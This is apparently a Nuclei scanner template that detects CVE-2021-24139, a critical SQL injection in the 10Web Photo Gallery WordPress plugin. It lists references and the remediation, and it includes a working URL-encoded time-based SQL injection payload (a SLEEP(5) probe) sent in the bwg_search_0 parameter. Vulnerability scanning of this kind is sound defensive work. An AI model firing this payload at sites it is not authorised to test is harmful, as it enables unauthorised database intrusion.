id: CVE-2021-24139

info:
  name: 10Web Photo Gallery < 1.5.55 - SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.5.55 or later.
  reference:
    - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24139
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24139
    cwe-id: CWE-89
    epss-score: 0.48385
    epss-percentile: 0.97797
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 10web
    product: photo_gallery
    publicwww-query: "bwg_container"
  tags: cve,cve2021,wp,wp-plugin,sqli,photo-gallery,10web,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: slug
        group: 1
        regex:
          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg'
        internal: true

  - raw:
      - |
        @timeout: 50s
        GET /{{slug}}/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code==200'
# digest: 4b0a0048304602210081e97024cec0fa3c0581153f1ad11a2d487e570354ba0547296f4830c8681ed2022100892872210019cbdc0309622c91f46e095a46e7a895fe62a6f02665c2a2e2688f:922c64590222798bb761d5b6d8e72950